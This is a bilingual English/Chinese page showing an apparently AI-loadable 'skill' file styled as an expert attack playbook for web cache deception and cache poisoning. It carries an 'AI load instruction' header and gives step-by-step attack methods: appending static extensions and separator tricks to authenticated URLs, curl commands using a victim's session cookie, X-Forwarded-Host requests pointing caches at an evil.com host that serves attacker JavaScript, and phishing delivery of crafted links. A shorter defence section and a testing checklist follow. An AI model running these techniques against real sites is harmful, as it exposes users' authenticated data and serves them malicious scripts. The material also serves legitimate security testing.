Back to Details

web-cache-deception

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SKILL: Web Cache Deception — Expert Attack Playbook

SKILL: Web Cache Deception — 专家攻击手册

AI LOAD INSTRUCTION: Web cache deception and poisoning techniques. Covers path confusion attacks, CDN cache behavior exploitation, cache key manipulation, and the distinction between cache deception (steal data) and cache poisoning (serve malicious content). Presented by Omer Gil at Black Hat 2017 and significantly expanded since.
AI加载说明:Web缓存欺骗与投毒技术,涵盖路径混淆攻击、CDN缓存行为利用、缓存键操控,以及缓存欺骗(窃取数据)和缓存投毒(投放恶意内容)的区别。该技术由Omer Gil在2017年Black Hat大会上提出,之后得到了大幅拓展。

1. CORE CONCEPTS

1. 核心概念

Web Cache Deception (steal authenticated data)

Web缓存欺骗(窃取已认证数据)

The attacker tricks a victim into requesting their authenticated page at a URL that the cache considers static:
Victim visits: https://target.com/account/profile/nonexistent.css
→ Application ignores "nonexistent.css", serves /account/profile (with auth data)
→ CDN sees .css extension → caches the response
→ Attacker fetches: https://target.com/account/profile/nonexistent.css
→ CDN serves cached authenticated content → attacker reads victim's data
攻击者诱导受害者请求一个被缓存视为静态资源的已认证页面URL:
Victim visits: https://target.com/account/profile/nonexistent.css
→ Application ignores "nonexistent.css", serves /account/profile (with auth data)
→ CDN sees .css extension → caches the response
→ Attacker fetches: https://target.com/account/profile/nonexistent.css
→ CDN serves cached authenticated content → attacker reads victim's data

Web Cache Poisoning (serve malicious content)

Web缓存投毒(投放恶意内容)

The attacker manipulates unkeyed request components (headers, cookies) to make the cache store a malicious response:
GET /page HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
→ Application generates: <script src="https://evil.com/js/app.js">
→ Cache stores this response
→ Normal users hit cache → load attacker's JavaScript
攻击者操控未纳入缓存键的请求组件(请求头、Cookie),让缓存存储恶意响应:
GET /page HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
→ Application generates: <script src="https://evil.com/js/app.js">
→ Cache stores this response
→ Normal users hit cache → load attacker's JavaScript

2. CACHE DECEPTION — ATTACK METHODOLOGY

2. 缓存欺骗——攻击方法

Step 1: Identify Cacheable Path Patterns

步骤1:识别可缓存路径模式

CDNs typically cache by file extension:
text
.css  .js  .jpg  .png  .gif  .svg  .ico
.woff .woff2  .ttf  .pdf  .json (sometimes)
CDN通常按文件后缀判断是否缓存:
text
.css  .js  .jpg  .png  .gif  .svg  .ico
.woff .woff2  .ttf  .pdf  .json (sometimes)

Step 2: Test Path Confusion

步骤2:测试路径混淆

text
undefined
text
undefined

Append static extension to authenticated endpoint:

给已认证接口追加静态资源后缀:

https://target.com/api/me/info.css https://target.com/account/profile/x.js https://target.com/settings/avatar.png https://target.com/dashboard/data.json
https://target.com/api/me/info.css https://target.com/account/profile/x.js https://target.com/settings/avatar.png https://target.com/dashboard/data.json

Path traversal style:

路径穿越风格:

https://target.com/account/profile/..%2fstatic/app.css
undefined
https://target.com/account/profile/..%2fstatic/app.css
undefined

Step 3: Verify Caching

步骤3:验证缓存有效性

bash
undefined
bash
undefined

Request as victim (authenticated):

以受害者身份(已认证)发起请求:

curl -H "Cookie: session=VICTIM" https://target.com/account/profile/x.css
curl -H "Cookie: session=VICTIM" https://target.com/account/profile/x.css

Check response headers:

检查响应头:

X-Cache: MISS (first request)

X-Cache: MISS (首次请求)

Age: 0

Age: 0

Request again as attacker (no auth):

以攻击者身份(未认证)再次发起请求:

curl https://target.com/account/profile/x.css
curl https://target.com/account/profile/x.css

Check response:

检查响应:

X-Cache: HIT

X-Cache: HIT

Contains victim's authenticated content? → vulnerable

包含受害者的已认证内容?→ 存在漏洞

undefined
undefined

Step 4: Deliver to Victim

步骤4:投递给受害者

Send the crafted URL to victim via phishing, message, or embed:
https://target.com/account/profile/tracking.gif
将构造好的URL通过钓鱼、消息或嵌入的方式发送给受害者:
https://target.com/account/profile/tracking.gif

3. CACHE POISONING — ATTACK METHODOLOGY

3. 缓存投毒——攻击方法

Unkeyed Input Discovery

未纳入缓存键的输入发现

Cache keys typically include: 
Host
, URL path, query string. These are typically NOT in the cache key: 
X-Forwarded-Host
, 
X-Forwarded-Scheme
, 
X-Original-URL
, cookies, custom headers.
bash
undefined
缓存键通常包含:
Host
、URL路径、查询字符串。 以下内容通常不纳入缓存键:
X-Forwarded-Host
X-Forwarded-Scheme
X-Original-URL
、Cookie、自定义请求头。
bash
undefined

Test if X-Forwarded-Host is reflected but not keyed:

测试X-Forwarded-Host是否被响应反射但未纳入缓存键:

curl -H "X-Forwarded-Host: evil.com" https://target.com/page
curl -H "X-Forwarded-Host: evil.com" https://target.com/page

If response contains evil.com and caches → poisonable

如果响应包含evil.com且被缓存 → 可被投毒

undefined
undefined

Common Unkeyed Headers

常见未纳入缓存键的请求头

text
X-Forwarded-Host      X-Forwarded-Scheme    X-Forwarded-Proto
X-Original-URL        X-Rewrite-URL         X-Host
X-Forwarded-Server    Forwarded             True-Client-IP
text
X-Forwarded-Host      X-Forwarded-Scheme    X-Forwarded-Proto
X-Original-URL        X-Rewrite-URL         X-Host
X-Forwarded-Server    Forwarded             True-Client-IP

Cache Poisoning via Host Header

通过Host请求头实现缓存投毒

GET / HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com

→ Response: <link href="//evil.com/static/main.css">
→ Cached → all users load attacker's CSS/JS
GET / HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com

→ Response: <link href="//evil.com/static/main.css">
→ Cached → all users load attacker's CSS/JS

4. PATH NORMALIZATION DIFFERENCES

4. 路径标准化差异

The key to cache deception: CDN and application normalize paths differently.
ComponentBehavior
CDN (Cloudflare, Akamai)Caches based on full URL path including extension
Application (Rails, Django, Express)May ignore trailing path segments or extensions
Reverse proxy (Nginx)May strip or rewrite path before forwarding
text
undefined
缓存欺骗的核心:CDN和应用的路径标准化规则不同
组件行为
CDN (Cloudflare, Akamai)基于完整URL路径(含后缀)判断是否缓存
应用 (Rails, Django, Express)可能忽略末尾路径段或后缀
反向代理 (Nginx)可能在转发前删除或重写路径
text
undefined

Application treats these as equivalent:

应用会将以下路径视为等价:

/account/profile /account/profile/anything /account/profile/x.css /account/profile;.css
/account/profile /account/profile/anything /account/profile/x.css /account/profile;.css

CDN treats .css as cacheable static asset

CDN会将.css后缀视为可缓存静态资源

→ Mismatch = vulnerability

---
→ 规则不匹配 = 漏洞

---

5. CACHE POISONING REAL-WORLD PATTERN

5. 缓存投毒真实场景模式

X-Forwarded-Host → Open Graph / Meta Tag Injection

X-Forwarded-Host → Open Graph / Meta标签注入

text
undefined
text
undefined

Target page uses X-Forwarded-Host to generate meta tags:

目标页面使用X-Forwarded-Host生成meta标签:

GET / HTTP/1.1 Host: target.com X-Forwarded-Host: evil.com
GET / HTTP/1.1 Host: target.com X-Forwarded-Host: evil.com

Response:

响应:

<meta property="og:image" content="https://evil.com/assets/logo.png">
<meta property="og:image" content="https://evil.com/assets/logo.png">

or:

或者:

<link rel="canonical" href="https://evil.com/">
<link rel="canonical" href="https://evil.com/">

If response is cached → all users see evil.com references

如果响应被缓存 → 所有用户都会看到evil.com的引用

Impact: XSS via injected JS path, phishing via canonical redirect, SEO hijack

影响:通过注入的JS路径实现XSS、通过规范链接跳转实现钓鱼、SEO劫持

undefined
undefined

Cache Deception with Path Separator Tricks

利用路径分隔符技巧实现缓存欺骗

text
undefined
text
undefined

Semicolon (treated as path parameter by some frameworks):

分号(部分框架会视为路径参数):

/account/profile;.css
/account/profile;.css

Encoded separators:

编码后的分隔符:

/account/profile%2F.css
/account/profile%2F.css

Trailing dot/space:

末尾点/空格:

/account/profile/.css /account/profile .css

---
/account/profile/.css /account/profile .css

---

6. DEFENSE

6. 防御措施

For Cache Deception

针对缓存欺骗

  • Cache only explicitly static paths (e.g., 
    /static/*
    , 
    /assets/*
    )
  • Never cache based on file extension alone
  • Set 
    Cache-Control: no-store, private
    on authenticated endpoints
  • Use 
    Vary: Cookie
    to prevent cross-user cache hits
  • 仅缓存明确的静态路径(例如 
    /static/*
    /assets/*
  • 永远不要仅根据文件后缀判断是否缓存
  • 给已认证接口设置 
    Cache-Control: no-store, private
    响应头
  • 使用 
    Vary: Cookie
    避免跨用户缓存命中

For Cache Poisoning

针对缓存投毒

  • Include all reflected headers in cache key
  • Validate and sanitize 
    X-Forwarded-*
    headers
  • Use 
    Cache-Control: no-cache
    for dynamic content
  • Strip unknown headers at CDN edge
  • 将所有会被响应反射的请求头纳入缓存键
  • 验证并清理 
    X-Forwarded-*
    类请求头
  • 动态内容使用 
    Cache-Control: no-cache
    响应头
  • 在CDN边缘节点删除未知请求头

6. TESTING CHECKLIST

6. 测试检查清单

□ Identify CDN/cache layer (X-Cache, Age, Via headers)
□ Append .css/.js/.png to authenticated API endpoints
□ Check if response is cached (X-Cache: HIT on second request)
□ Test path separators: /x.css, ;.css, %2F.css
□ Test unkeyed headers: X-Forwarded-Host, X-Original-URL
□ Verify Cache-Control headers on sensitive endpoints
□ Check Vary header presence
□ Test with and without authentication
□ 识别CDN/缓存层(通过X-Cache、Age、Via响应头)
□ 给已认证API接口追加.css/.js/.png后缀
□ 检查响应是否被缓存(第二次请求返回X-Cache: HIT)
□ 测试路径分隔符:/x.css、;.css、%2F.css
□ 测试未纳入缓存键的请求头:X-Forwarded-Host、X-Original-URL
□ 验证敏感接口的Cache-Control响应头
□ 检查Vary头是否存在
□ 分别在已认证和未认证状态下测试